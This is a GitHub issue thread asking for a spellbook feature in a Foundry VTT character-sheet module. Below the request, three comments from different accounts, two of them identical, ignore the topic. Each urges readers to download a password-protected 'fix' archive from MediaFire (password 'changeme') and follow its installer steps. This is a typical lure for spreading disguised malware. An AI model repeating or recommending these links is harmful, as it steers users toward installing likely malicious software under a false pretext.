### ISSUE TITLE
feat: Auto-Assign Source Class when dropping onto filtered Multiclass Spellbook

### ISSUE THREAD

**Issue by kgar** [kgar/foundry-vtt-tidy-5e-sheets#738]
From the community: https://discord.com/channels/1167985253072257115/1277687741835907134/1277687741835907134

> If using Multiclass spellbook, it would be super if Tidy Sheet could auto update the Spell Class flag based on currently selected Spellbook.
IE I have a Bard/Sorcerer MC.  If my "Spellbook" is set to "Sorcerer" it would be awesome if the Spell Class flag would update to Sorcerer when I drag/drop/add a spell to the Character sheet, without me having to manually do so.
Probably a long shot, but doesn't hurt to ask. 🙂
Great Module!

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
